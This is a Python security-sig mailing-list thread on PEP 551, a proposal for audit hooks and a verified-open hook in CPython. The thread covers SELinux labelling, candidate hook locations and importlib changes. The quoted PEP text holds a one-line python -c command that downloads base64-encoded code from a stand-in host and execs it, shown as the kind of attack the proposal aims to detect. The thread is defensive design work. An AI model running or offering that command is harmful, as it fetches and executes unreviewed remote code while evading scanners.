Though as long as the replacement itself triggers an auditable event, 
regardless of subsequent events, we have been successful. Currently 
though, `sys.modules['audit'] = SomethingElse` is not audited (and 
likely not trivial - of course, that doesn't block this PEP, but it 
remains as a future possibility for someone who wants to make it happen).

Cheers,
Steve

From james at dontusethiscode.com  Fri Aug 25 13:53:38 2017
From: james at dontusethiscode.com (James Powell)
Date: Fri, 25 Aug 2017 13:53:38 -0400
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <df3f3111-a541-dcad-7b33-0fdd31615706@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CADiSq7d83-o9e8WgUUuhhb+M=P+PdEb+HMHR0vzPPxAcYv+Wsg@mail.gmail.com>
 <df3f3111-a541-dcad-7b33-0fdd31615706@python.org>
Message-ID: <DBE55D32-4DA0-4BF8-97E1-32DD3169D87D@dontusethiscode.com>


> On Aug 25, 2017, at 13:22, Steve Dower <steve.dower at python.org> wrote:
> (This is also the reasoning for using static variables internally rather than interpreter state - it's much harder to infer the address of a static C variable with pure Python code than a field in a struct.)

I'll add a little bit of detail. These aren't "security features"; they're "security transparency features." We acknowledge that we cannot block every malicious payload, but we should at least make it possible to audit interpreter state for post-mortem forensic purposes. 

We wouldn't want it to be too easy to turn off these auditing features, and I've done a good amount of research into corrupting the running state of a CPython interpreter. Keeping things in builtin modules and in memory not directly exposed to the interpreter creates a real barrier to these techniques, and makes it meaningfully harder for an attacker to just disable the features at the start of their payload.

:h


From christian at python.org  Fri Aug 25 13:58:20 2017
From: christian at python.org (Christian Heimes)
Date: Fri, 25 Aug 2017 19:58:20 +0200
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <df3f3111-a541-dcad-7b33-0fdd31615706@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CADiSq7d83-o9e8WgUUuhhb+M=P+PdEb+HMHR0vzPPxAcYv+Wsg@mail.gmail.com>
 <df3f3111-a541-dcad-7b33-0fdd31615706@python.org>
Message-ID: <e58db67e-30b0-f9e2-6b4c-cd9fe651f0fe@python.org>

On 2017-08-25 19:22, Steve Dower wrote:
> Nice. I looked into SELinux and didn't find any docs about how to add
> labels. I'd really like to include links that help people actually
> implement this stuff - any tips?

You can use chcon (change context) to temporarily change the labels of a
file or directory structure. However that is the recommended way to deal
with SELinux labels. Typically SELinux types and labels are either
defined in the system global policy or by additional package policies.
File labels are usually set by rules. This has the advantage that new
files automatically get the right context.

Here is a simplified and partial example for a simple Python
'myservice'. When the service is started by the init system, the process
is automatically transitions into the myservice_exec_t domain.

# file context
/usr/sbin/myservice -- gen_context(system_u:object_r:myservice_exec_t,s0)
/usr/lib/python3.6(/.*)? gen_context(system_u:object_r:python_module_t,s0)

# definitions
type myservice_t;
type myservice_exec_t;
init_daemon_domain(myservice_t, myservice_exec_t)

type python_module_t
files_type(python_module_t)

allow myservice_t python_module_t:file { getattr open read };


We can talk about SELinux during the sprint. If you like either Nick,
Victor, or I could contact some engineers from SELinux (Dan) and Linux
auditing team (Paul, RGB) here at Red Hat.

Christian

From christian at python.org  Fri Aug 25 14:05:02 2017
From: christian at python.org (Christian Heimes)
Date: Fri, 25 Aug 2017 20:05:02 +0200
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
Message-ID: <66e0917a-0524-d14c-565b-0641b363eb5a@python.org>

On 2017-08-24 19:13, Steve Dower wrote:
> Hi security-sig,
> 
> Those of you who were at the PyCon US language summit this year (or who
> saw the coverage at https://lwn.net/Articles/723823/) may recall that I
> talked briefly about the ways Python is used by attackers to gain and/or
> retain access to systems on local networks.
[...]
> TODO - more hooks in ``_socket``, ``_ssl``, others?

Does it make sense to include mmap()? After all mmap can be used to
execute arbitrary machine code in memory.

For the SSL module, what would you like to log? Server certs and
connection parameters (cipher suite)?

Christian

From steve.dower at python.org  Fri Aug 25 16:23:53 2017
From: steve.dower at python.org (Steve Dower)
Date: Fri, 25 Aug 2017 13:23:53 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <e58db67e-30b0-f9e2-6b4c-cd9fe651f0fe@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CADiSq7d83-o9e8WgUUuhhb+M=P+PdEb+HMHR0vzPPxAcYv+Wsg@mail.gmail.com>
 <df3f3111-a541-dcad-7b33-0fdd31615706@python.org>
 <e58db67e-30b0-f9e2-6b4c-cd9fe651f0fe@python.org>
Message-ID: <94d78dd8-abc9-8664-bcc7-c72c0cd47adc@python.org>

On 25Aug2017 1058, Christian Heimes wrote:
> Here is a simplified and partial example for a simple Python
> 'myservice'. When the service is started by the init system, the process
> is automatically transitions into the myservice_exec_t domain.
> 
> [SNIP]
I feel like the piece I'm missing is what needs to be added to the 
CPython source to make this all work. (As with auditd - when Nick 
pointed it out to me I wasn't comfortable until I found a sample using 
audit_open().)

> We can talk about SELinux during the sprint. If you like either Nick,
> Victor, or I could contact some engineers from SELinux (Dan) and Linux
> auditing team (Paul, RGB) here at Red Hat.

I'm very keen for as many platform-specific proofs of concept as 
possible. The more people who are thinking "if I had this information 
available, what would I do with it?" the better.

Cheers,
Steve

From steve.dower at python.org  Fri Aug 25 16:29:26 2017
From: steve.dower at python.org (Steve Dower)
Date: Fri, 25 Aug 2017 13:29:26 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <66e0917a-0524-d14c-565b-0641b363eb5a@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <66e0917a-0524-d14c-565b-0641b363eb5a@python.org>
Message-ID: <208bad1b-168c-3579-2295-7742a28ce111@python.org>

On 25Aug2017 1105, Christian Heimes wrote:
> On 2017-08-24 19:13, Steve Dower wrote:
>> Hi security-sig,
>>
>> Those of you who were at the PyCon US language summit this year (or who
>> saw the coverage at https://lwn.net/Articles/723823/) may recall that I
>> talked briefly about the ways Python is used by attackers to gain and/or
>> retain access to systems on local networks.
> [...]
>> TODO - more hooks in ``_socket``, ``_ssl``, others?
> 
> Does it make sense to include mmap()? After all mmap can be used to
> execute arbitrary machine code in memory.

Yes, absolutely. I think array and struct can too without having to go 
through ctypes.

> For the SSL module, what would you like to log? Server certs and
> connection parameters (cipher suite)?

I've seen some samples of code that disable validation or use alternate 
CA certs. Probably context creation is the most important aspect, since 
I think a lot of the rest will be caught by the _socket module. There's 
a good balance somewhere between collecting all network traffic (though 
not necessarily keeping it anywhere) or none, but I'm not entirely sure 
where that is yet.

I'll probably spend a day this weekend continuing to go through the 
stdlib and see what I think should be included. No doubt we'll spend 
time at the sprints arguing over specific items - I'm looking forward to 
it :)

Cheers,
Steve

From christian at python.org  Fri Aug 25 17:23:51 2017
From: christian at python.org (Christian Heimes)
Date: Fri, 25 Aug 2017 23:23:51 +0200
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <94d78dd8-abc9-8664-bcc7-c72c0cd47adc@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CADiSq7d83-o9e8WgUUuhhb+M=P+PdEb+HMHR0vzPPxAcYv+Wsg@mail.gmail.com>
 <df3f3111-a541-dcad-7b33-0fdd31615706@python.org>
 <e58db67e-30b0-f9e2-6b4c-cd9fe651f0fe@python.org>
 <94d78dd8-abc9-8664-bcc7-c72c0cd47adc@python.org>
Message-ID: <9146e1e5-8cec-9442-f3a4-618acf86cbcf@python.org>

On 2017-08-25 22:23, Steve Dower wrote:
> On 25Aug2017 1058, Christian Heimes wrote:
>> Here is a simplified and partial example for a simple Python
>> 'myservice'. When the service is started by the init system, the process
>> is automatically transitions into the myservice_exec_t domain.
>>
>> [SNIP]
> I feel like the piece I'm missing is what needs to be added to the
> CPython source to make this all work. (As with auditd - when Nick
> pointed it out to me I wasn't comfortable until I found a sample using
> audit_open().)

I need to talk to some people before I can give you a good answer. A
poor man's solution would look like this:

with open(modulefile, 'rb') as f:
    context = fgetfilecon(f.fileno())
    user, role, type, label = context.split(':', 4)
    if type != 'python_code_t':
       raise PermissionError

I'm pretty sure it is the wrong approach. Python should not check
SELinux labels. Instead we should ask if the current process context is
allowed to perform a specific action (import a Python file) for a file
with a certain context. I don't know how to archive this kind of check.
Perhaps something like this may work:

avc_has_perm(
    getcon(),
    fgetfilecon(f.fileno()),
    SECCLASS_FILE,
    FILE__EXECUTE,
    metadata  # to be filled with file name
)

This would also log proper audit events.

>> We can talk about SELinux during the sprint. If you like either Nick,
>> Victor, or I could contact some engineers from SELinux (Dan) and Linux
>> auditing team (Paul, RGB) here at Red Hat.
> 
> I'm very keen for as many platform-specific proofs of concept as
> possible. The more people who are thinking "if I had this information
> available, what would I do with it?" the better.

I'll try to get in context with some people on Monday.

Christian

From brett at python.org  Sat Aug 26 09:45:35 2017
From: brett at python.org (Brett Cannon)
Date: Sat, 26 Aug 2017 13:45:35 +0000
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <E1dl4HZ-0007dO-Sb@se2-syd.hostedmail.net.au>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAP1=2W6Kmjfrkg49hkT8B--cZmO=Nd4W4cvjrrYL8NoJbGuxxw@mail.gmail.com>
 <E1dl4HZ-0007dO-Sb@se2-syd.hostedmail.net.au>
Message-ID: <CAP1=2W43bRebitrQpRbR0U0z2AusGozutDWyaFL1vjD-8UAmyg@mail.gmail.com>

Is there going to be a visible flag or anything to know you're running a
restricted version of Python? If so then a subclass will allow us to
override get_code() so that it just skips .pyc files and it can be used
automatically when the flag is set. That way users of spython don't have to
think about setting that up. Otherwise we could provide a function in
importlib._bootstrap that you call during initialization to turn this on.

P.S. sorry to everyone for the slightly scattered comments; doing all of
these emails from my phone while in NYC for JupyterCon.

On Thu, Aug 24, 2017, 22:24 Steve Dower <steve.dower at python.org> wrote:

> I think overriding get_data in the subclass for source loading is the
> right approach. Rejecting .pyc files in the hook is easy enough, but for
> anyone doing proper validation (with a certificate or access control) I?d
> expect pyc?s to fail anyway.
>
>
>
> Top-posted from my Windows phone
>
>
>
> *From: *Brett Cannon <brett at python.org>
> *Sent: *Thursday, August 24, 2017 18:58
> *To: *Steve Dower <steve.dower at python.org>; security-sig at python.org
> *Cc: *lee.holmes at microsoft.com; james at dontusethiscode.com
> *Subject: *Re: PEP 551: Security transparency in the Python runtime
>
>
>
> One point to make about the importlib changes is that since it's currently
> being made to importlib.abc.FileLoader.get_data()
> <https://docs.python.org/3/library/importlib.html#importlib.abc.FileLoader.get_data>
> that the default case for reading a non-.py file is to do nothing and allow
> the read to occur. Otherwise there will be issues with code that is using
> that method to read data files (which is a legit use-case). Otherwise we're
> going to need a new subclass of importlib.machinery.SourceFileLoader where
> we document that you can't use get_data() to read arbitrary bytes or
> restructure get_code() to not use get_data(). Or we need a new API to flag
> when get_data() should do a verifying open().
>
> There should also the issue of not reading .pyc files which will either
> have to be addressed by coming up with a complimentary flag to
> PYTHONDONTWRITEBYTECODE or once again a special subclass where get_code()
> ignores bytecode completely.
>
>
>
> On Thu, 24 Aug 2017 at 13:14 Steve Dower <steve.dower at python.org> wrote:
>
> Hi security-sig,
>
> Those of you who were at the PyCon US language summit this year (or who
> saw the coverage at https://lwn.net/Articles/723823/) may recall that I
> talked briefly about the ways Python is used by attackers to gain and/or
> retain access to systems on local networks.
>
> This comes out of work we've been doing at Microsoft to balance the
> flexibility of scripting languages with their usefulness to malicious
> users. PowerShell in particular has had a lot of work done, and we've
> been doing the same internally for Python. Things like transcripting
> (log every piece of code when it is compiled) and signature validation
> (prevent loading unsigned code).
>
> This PEP is about upstreaming enough functionality to make it easier to
> maintain these features - it is *not* intended to add specific security
> features to the core release. The aim is to be able to use a standard
> libpython3.7/python37.dll with a custom python3.7/python.exe that adds
> those features (listed in the PEP).
>
> Right now parts of the PEP is incomplete. In particular, the
> Recommendations section is much shorter than I intend, the list of log
> hook locations is also too short, and I have only done a preliminary
> performance analysis. But it's time to get reviews of the overall
> concept. I'd also like to take suggestions for more hook locations and
> relevant recommendations, so feel free to throw them out there. In
> particular, I'm not as up to date on best practices for non-Windows
> platforms as the rest of the list, so feel free to correct or improve
> those parts.
>
> Because ReST+max 80 character width makes tables completely unreadable
> in source, I suggest reading it at
> https://github.com/python/peps/blob/master/pep-0551.rst but I've
> included the full text below for quoting purposes.
>
> My current implementation is available at
> https://github.com/zooba/cpython/tree/sectrans and should work on both
> Windows and Linux. I hope to take this to python-dev by next week and
> spend the dev sprints getting the PEP to the point where it can be
> accepted.
>
> ==========================================================
>
> PEP: 551
> Title: Security transparency in the Python runtime
> Version: $Revision$
> Last-Modified: $Date$
> Author: Steve Dower <steve.dower at python.org>
> Status: Draft
> Type: Standards Track
> Content-Type: text/x-rst
> Created: 23-Aug-2017
> Python-Version: 3.7
> Post-History:
>
> Abstract
> ========
>
> This PEP describes additions to the Python API and specific behaviors
> for the
> CPython implementation that make actions taken by the Python runtime
> visible to
> security and auditing tools. The goals in order of increasing importance
> are to
> prevent malicious use of Python, to detect and report on malicious use,
> and most
> importantly to detect attempts to bypass detection. Most of the
> responsibility
> for implementation is required from users, who must customize and build
> Python
> for their own environment.
>
> We propose two small sets of public APIs to enable users to reliably
> build their
> copy of Python without having to modify the core runtime, protecting future
> maintainability. We also discuss recommendations for users to help them
> develop
> and configure their copy of Python.
>
> Background
> ==========
>
> Software vulnerabilities are generally seen as bugs that enable remote or
> elevated code execution. However, in our modern connected world, the more
> dangerous vulnerabilities are those that enable advanced persistent threats
> (APTs). APTs are achieved when an attacker is able to penetrate a network,
> establish their software on one or more machines, and over time extract
> data or
> intelligence. Some APTs may make themselves known by maliciously
> damaging data
> (e.g., `WannaCrypt
> <
> https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/WannaCrypt
> >`_)
> or hardware (e.g., `Stuxnet
> <
> https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?name=Win32/Stuxnet
> >`_).
> Most attempt to hide their existence and avoid detection. APTs often use a
> combination of traditional vulnerabilities, social engineering, phishing
> (or
> spear-phishing), thorough network analysis, and an understanding of
> misconfigured environments to establish themselves and do their work.
>
> The first infected machines may not be the final target and may not require
> special privileges. For example, an APT that is established as a
> non-administrative user on a developer?s machine may have the ability to
> spread
> to production machines through normal deployment channels. It is common
> for APTs
> to persist on as many machines as possible, with sheer weight of
> presence making
> them difficult to remove completely.
>
> Whether an attacker is seeking to cause direct harm or hide their
> tracks, the
> biggest barrier to detection is a lack of insight. System administrators
> with
> large networks rely on distributed logs to understand what their
> machines are
> doing, but logs are often filtered to show only error conditions. APTs
> that are
> attempting to avoid detection will rarely generate errors or abnormal
> events.
> Reviewing normal operation logs involves a significant amount of effort,
> though
> work is underway by a number of companies to enable automatic anomaly
> detection
> within operational logs. The tools preferred by attackers are ones that are
> already installed on the target machines, since log messages from these
> tools
> are often expected and ignored in normal use.
>
> At this point, we are not going to spend further time discussing the
> existence
> of APTs or methods and mitigations that do not apply to this PEP. For
> further
> information about the field, we recommend reading or watching the resources
> listed under `Further Reading`_.
>
> Python is a particularly interesting tool for attackers due to its
> prevalence on
> server and developer machines, its ability to execute arbitrary code
> provided as
> data (as opposed to native binaries), and its complete lack of internal
> logging.
> This allows attackers to download, decrypt, and execute malicious code
> with a
> single command::
>
>      python -c "import urllib.request, base64;
> exec(base64.b64decode(urllib.request.urlopen('
> http://my-exploit/py.b64')).decode())"
>
> This command currently bypasses most anti-malware scanners that rely on
> recognizable code being read through a network connection or being
> written to
> disk (base64 is often sufficient to bypass these checks). It also bypasses
> protections such as file access control lists or permissions (no file
> access
> occurs), approved application lists (assuming Python has been approved
> for other
> uses), and automated auditing or logging (assuming Python is allowed to
> access
> the internet or access another machine on the local network from which
> to obtain
> its payload).
>
> General consensus among the security community is that totally preventing
> attacks is infeasible and defenders should assume that they will often
> detect
> attacks only after they have succeeded. This is known as the "assume
> breach"
> mindset. [1]_ In this scenario, protections such as sandboxing and input
> validation have already failed, and the important task is detection,
> tracking,
> and eventual removal of the malicious code. To this end, the primary
> feature
> required from Python is security transparency: the ability to see what
> operations the Python runtime is performing that may indicate anomalous or
> malicious use. Preventing such use is valuable, but secondary to the need
> to
> know that it is occurring.
>
> To summarise the goals in order of increasing importance:
>
> * preventing malicious use is valuable
> * detecting malicious use is important
> * detecting attempts to bypass detection is critical
>
> One example of a scripting engine that has addressed these challenges is
> PowerShell, which has recently been enhanced towards similar goals of
> transparency and prevention. [2]_
>
> Generally, application and system configuration will determine which events
> within a scripting engine are worth logging. However, given the value of
> many
> logs events are not recognized until after an attack is detected, it is
> important to capture as much as possible and filter views rather than
> filtering
> at the source (see the No Easy Breach video from above). Events that are
> always
> of interest include attempts to bypass event logging, attempts to load and
> execute code that is not correctly signed or access-controlled, use of
> uncommon
> operating system functionality such as debugging or inter-process
> inspection
> tools, most network access and DNS resolution, and attempts to create
> and hide
> files or configuration settings on the local machine.
>
> To summarize, defenders have a need to audit specific uses of Python in
> order to
> detect abnormal or malicious usage. Currently, the Python runtime does not
> provide any ability to do this, which (anecdotally) has led to
> organizations
> switching to other languages. The aim of this PEP is to enable system
> administrators to deploy a security transparent copy of Python that can
> integrate with their existing auditing and protection systems.
>
> On Windows, some specific features that may be enabled by this include:
>
> * Script Block Logging [3]_
> * DeviceGuard [4]_
> * AMSI [5]_
> * Persistent Zone Identifiers [6]_
> * Event tracing (which includes event forwarding) [7]_
>
> On Linux, some specific features that may be integrated are:
>
> * gnupg [8]_
> * sd_journal [9]_
> * OpenBSM [10]_
> * syslog [11]_
> * check execute bit on imported modules
>
>
> On macOS, some features that may be used with the expanded APIs are:
>
> * OpenBSM [10]_
> * syslog [11]_
>
> Overall, the ability to enable these platform-specific features on
> production
> machines is highly appealing to system administrators and will make Python
> a
> more trustworthy dependency for application developers.
>
>
> Overview of Changes
> ===================
>
> True security transparency is not fully achievable by Python in
> isolation. The
> runtime can log as many events as it likes, but unless the logs are
> reviewed and
> analyzed there is no value. Python may impose restrictions in the name of
> security, but usability may suffer. Different platforms and environments
> will
> require different implementations of certain security features, and
> organizations with the resources to fully customize their runtime should be
> encouraged to do so.
>
> The aim of these changes is to enable system administrators to integrate
> Python
> into their existing security systems, without dictating what those
> systems look
> like or how they should behave. We propose two API changes to enable
> this: an
> Event Log Hook and Verified Open Hook. Both are not set by default, and
> both
> require modifying the appropriate entry point to enable any
> functionality. For
> the purposes of validation and example, we propose a new
> spython/spython.exe
> entry point program that enables some basic functionality using these
> hooks.
> However, the expectation is that security-conscious organizations will
> create
> their own entry points to meet their needs.
>
> Event Log Hook
> --------------
>
> In order to achieve security transparency, an API is required to raise
> messages
> from within certain operations. These operations are typically deep
> within the
> Python runtime or standard library, such as dynamic code compilation,
> module
> imports, DNS resolution, or use of certain modules such as ``ctypes``.
>
> The new APIs required for log hooks are::
>
>     # Add a logging hook
>     sys.addloghook(hook: Callable[str, tuple]) -> None
>     int PySys_AddLogHook(int (*hook)(const char *event, PyObject *args));
>
>     # Raise an event with all logging hooks
>     sys.loghook(str, *args) -> None
>     int PySys_LogHook(const char *event, PyObject *args);
>
>     # Internal API used during Py_Finalize() - not publicly accessible
>     void _Py_ClearLogHooks(void);
>
> Hooks are added by calling ``PySys_AddLogHook()`` from C at any time,
> including
> before ``Py_Initialize()``, or by calling ``sys.addloghook()`` from
> Python code.
> Hooks are never removed or replaced, and existing hooks have an
> opportunity to
> refuse to allow new hooks to be added (adding a logging hook is logged,
> and so
> preexisting hooks can raise an exception to block the new addition).
>
> When events of interest are occurring, code can either call
> ``PySys_LogHook()``
> from C (while the GIL is held) or ``sys.loghook()``. The string argument
> is the
> name of the event, and the tuple contains arguments. A given event name
> should
> have a fixed schema for arguments, and both arguments are considered a
> public
> API (for a given x.y version of Python), and thus should only change
> between
> feature releases with updated documentation.
>
> When an event is logged, each hook is called in the order it was added
> with the
> event name and tuple. If any hook returns with an exception set, later
> hooks are
> ignored and *in general* the Python runtime should terminate. This is
> intentional to allow hook implementations to decide how to respond to any
> particular event. The typical responses will be to log the event, abort the
> operation with an exception, or to immediately terminate the process with
> an
> operating system exit call.
>
> When an event is logged but no hooks have been set, the ``loghook()``
> function
> should include minimal overhead. Ideally, each argument is a reference to
> existing data rather than a value calculated just for the logging call.
>
> As hooks may be Python objects, they need to be freed during
> ``Py_Finalize()``.
> To do this, we add an internal API ``_Py_ClearLogHooks()`` that releases
> any
> ``PyObject*`` hooks that are held, as well as any heap memory used. This
> is an
> internal function with no public export, but it passes an event to all
> existing
> hooks to ensure that unexpected calls are logged.
>
> See `Log Hook Locations`_ for proposed log hook points and schemas, and the
> `Recommendations`_ section for discussion on appropriate responses.
>
> Verified Open Hook
> ------------------
>
> Most operating systems have a mechanism to distinguish between files
> that can be
> executed and those that can not. For example, this may be an execute bit
> in the
> permissions field, or a verified hash of the file contents to detect
> potential
> code tampering. These are an important security mechanism for preventing
> execution of data or code that is not approved for a given environment.
> Currently, Python has no way to integrate with these when launching
> scripts or
> importing modules.
>
> The new public API for the verified open hook is::
>
>     # Set the handler
>     int Py_SetOpenForExecuteHandler(PyObject *(*handler)(const char
> *narrow, const wchar_t *wide))
>
>     # Open a file using the handler
>     os.open_for_exec(pathlike)
>
> The ``os.open_for_exec()`` function is a drop-in replacement for
> ``open(pathlike, 'rb')``. Its default behaviour is to open a file for raw,
> binary access - any more restrictive behaviour requires the use of a custom
> handler. (Aside: since ``importlib`` requires access to this function
> before the
> ``os`` module has been imported, it will be available on the
> ``nt``/``posix``
> modules, but the intent is that other users will access it through the
> ``os``
> module.)
>
> A custom handler may be set by calling ``Py_SetOpenForExecuteHandler()``
> from C
> at any time, including before ``Py_Initialize()``. When
> ``open_for_exec()`` is
> called with a handler set, the handler will be passed the processed
> narrow or
> wide path, depending on platform, and its return value will be returned
> directly. The returned object should be an open file-like object that
> supports
> reading raw bytes. This is explicitly intended to allow a ``BytesIO``
> instance
> if the open handler has already had to read the file into memory in order
> to
> perform whatever verification is necessary to determine whether the
> content is
> permitted to be executed.
>
> Note that these handlers can import and call the ``_io.open()`` function on
> CPython without triggering themselves.
>
> If the handler determines that the file is not suitable for execution,
> it should
> raise an exception of its choice, as well as performing any other logging
> or
> notifications.
>
> All import and execution functionality involving code from a file will be
> changed to use ``open_for_exec()`` unconditionally. It is important to
> note that
> calls to ``compile()``, ``exec()`` and ``eval()`` do not go through this
> function - a log hook that includes the code from these calls will be
> added and
> is the best opportunity to validate code that is read from the file.
> Given the
> current decoupling between import and execution in Python, most imported
> code
> will go through both ``open_for_exec()`` and the log hook for
> ``compile``, and
> so care should be taken to avoid repeating verification steps.
>
> API Availability
> ----------------
>
> While all the functions added here are considered public and stable API,
> the
> behavior of the functions is implementation specific. The descriptions here
> refer to the CPython implementation, and while other implementations should
> provide the functions, there is no requirement that they behave the same.
>
> For example, ``sys.addloghook()`` and ``sys.loghook()`` should exist but
> may do
> nothing. This allows code to make calls to ``sys.loghook()`` without
> having to
> test for existence, but it should not assume that its call will have any
> effect.
> (Including existence tests in security-critical code allows another
> vector to
> bypass logging, so it is preferable that the function always exist.)
>
> ``os.open_for_exec()`` should at a minimum always return
> ``_io.open(pathlike,
> 'rb')``. Code using the function should make no further assumptions
> about what
> may occur, and implementations other than CPython are not required to let
> developers override the behavior of this function with a hook.
>
>
> Log Hook Locations
> ==================
>
> Calls to ``sys.loghook()`` or ``PySys_LogHook()`` will be added to the
> following
> operations with the schema in Table 1. Unless otherwise specified, the
> ability
> for log hooks to abort any listed operation should be considered part of
> the
> rationale for including the hook.
>
> .. csv-table:: Table 1: Log Hooks
>     :header: "API Function", "Event Name", "Arguments", "Rationale"
>     :widths: 2, 2, 3, 6
>
>     ``PySys_AddLogHook``, ``sys.addloghook``, "", "Detect when new log
> hooks are
>     being added."
>     ``_PySys_ClearLogHooks``, ``sys._clearloghooks``, "", "Notifies
> hooks they
>     are being cleaned up, mainly in case the event is triggered
> unexpectedly.
>     This event cannot be aborted."
>     ``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "",
> "Detects
>     any attempt to set the ``open_for_execute`` handler."
>     "``compile``, ``exec``, ``eval``, ``PyAst_CompileString``",
> ``compile``, "
>     ``(code, filename_or_none)``", "Detect dynamic code compilation.
> Note that
>     this will also be called for regular imports of source code,
> including those
>     that used ``open_for_exec``."
>     ``import``, ``import``, "``(module, filename, sys.path, sys.meta_path,
>     sys.path_hooks)``", "Detect when modules are imported. This is
> raised before
>     the module name is resolved to a file. All arguments other than the
> module
>     name may be ``None`` if they are not used or available."
>     "``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, "
>     ``(module_or_path,)``", "Detect when native modules are used."
>     ``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``",
> "Collect
>     information about specific symbols retrieved from native modules."
>     ``_ctypes._CData``, ``ctypes.cdata``, "``(ptr_as_int,)``", "Detect
> when code
>     is accessing arbitrary memory using ``ctypes``"
>     ``id``, ``id``, "``(id_as_int,)``", "Detect when code is accessing
> the id of
>     objects, which in CPython reveals information about memory layout."
>     ``sys._getframe``, ``sys._getframe``, "``(frame_object,)``", "Detect
> when
>     code is accessing frames directly"
>     ``sys._current_frames``, ``sys._current_frames``, "", "Detect when
> code is
>     accessing frames directly"
>     ``PyEval_SetProfile``, ``sys.setprofile``, "", "Detect when code is
> injecting
>     trace functions. Because of the implementation, exceptions raised
> from the
>     hook will abort the operation, but will not be raised in Python
> code. Note
>     that ``threading.setprofile`` eventually calls this function, so the
> event
>     will be logged for each thread."
>     ``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is
> injecting
>     trace functions. Because of the implementation, exceptions raised
> from the
>     hook will abort the operation, but will not be raised in Python
> code. Note
>     that ``threading.settrace`` eventually calls this function, so the
> event
>     will be logged for each thread."
>     ``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "",
> "
>     Detect changes to async generator hooks."
>     ``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "",
> "
>     Detect changes to async generator hooks."
>     ``_PyEval_SetCoroutineWrapper``, ``sys.set_coroutine_wrapper``, "",
> "Detect
>     changes to the coroutine wrapper."
>     ``Py_SetRecursionLimit``, ``sys.setrecursionlimit``,
> "``(new_limit,)``", "
>     Detect changes to the recursion limit."
>     ``_PyEval_SetSwitchInterval``, ``sys.setswitchinterval``,
> "``(interval_us,)``
>     ", "Detect changes to the switching interval."
>     "``socket.bind``, ``socket.connect``, ``socket.connect_ex``,
>     ``socket.sendmsg``, ``socket.sendto``", ``socket.address``,
> "``(address,)``
>     ", "Detect access to network resources. The address is unmodified
> from the
>     original call."
>     ``socket.__init__``, "socket()", "``(family, type, proto)``", "Detect
>     creation of sockets. The arguments will be int values."
>     ``socket.gethostname``, ``socket.gethostname``, "", "Detect attempts to
>     retrieve the current host name."
>     ``socket.sethostname``, ``socket.sethostname``, "``(name,)``", "Detect
>     attempts to change the current host name. The name argument is
> passed as a
>     bytes object."
>     "``socket.gethostbyname``, ``socket.gethostbyname_ex``", "
>     ``socket.gethostbyname``", "``(name,)``", "Detect host name
> resolution. The
>     name argument is a str or bytes object."
>     ``socket.gethostbyaddr``, ``socket.gethostbyaddr``,
> "``(address,)``", "Detect
>     host resolution. The address argument is a str or bytes object."
>     ``socket.getservbyname``, ``socket.getservbyname``, "``(name,
> protocol)``", "
>     Detect service resolution. The arguments are str objects."
>     ``socket.getservbyport``, ``socket.getservbyport``, "``(port,
> protocol)``", "
>     Detect service resolution. The port argument is an int and protocol is
> a
>     str."
>
> TODO - more hooks in ``_socket``, ``_ssl``, others?
>
>
> SPython Entry Point
> ===================
>
> A new entry point binary will be added, called ``spython.exe`` on
> Windows and
> ``spythonX.Y`` on other platforms. This entry point is intended
> primarily as an
> example, as we expect most users of this functionality to implement
> their own
> entry point and hooks (see `Recommendations`_). It will also be used for
> tests.
>
> Source builds will create ``spython`` by default, but distributors may
> choose
> whether to include ``spython`` in their pre-built packages. The python.org
> managed binary distributions will not include ``spython``.
>
> **Do not accept most command-line arguments**
>
> The ``spython`` entry point requires a script file be passed as the first
> argument, and does not allow any options. This prevents arbitrary code
> execution
> from in-memory data or non-script files (such as pickles, which can be
> executed
> using ``-m pickle <path>``.
>
> Options ``-B`` (do not write bytecode), ``-E`` (ignore environment
> variables)
> and ``-s`` (no user site) are assumed.
>
> If a file with the same full path as the process with a ``._pth`` suffix
> (``spython._pth`` on Windows, ``spythonX.Y._pth`` on Linux) exists, it
> will be
> used to initialize ``sys.path`` following the rules currently described
> `for
> Windows <https://docs.python.org/3/using/windows.html#finding-modules>`_.
>
> **Log security events to a file**
>
> Before initialization, ``spython`` will set a log hook that writes
> events to a
> local file. By default, this file is the full path of the process with a
> ``.log`` suffix, but may be overridden with the ``SPYTHONLOG`` environment
> variable (despite such overrides being explicitly discouraged in
> `Recommendations`_).
>
> The log hook will also abort all ``addloghook`` events, preventing any
> other
> hooks from being added.
>
> On Windows, code from ``compile`` events will submitted to AMSI [5]_ and
> if it
> fails to validate, the compile event will be aborted. This can be tested by
> calling ``compile()`` or ``eval()`` on the contents of the `EICAR test file
> <http://www.eicar.org/86-0-Intended-use.html>`_.
>
> **Restrict importable modules**
>
> Also before initialization, ``spython`` will set an open-for-execute
> hook that
> validates all files opened with ``os.open_for_exec``. This
> implementation will
> require all files to have a ``.py`` suffix (thereby blocking the use of
> cached
> bytecode), and will raise a custom log message ``spython.open_for_exec``
> containing ``(filename, True_if_allowed)``.
>
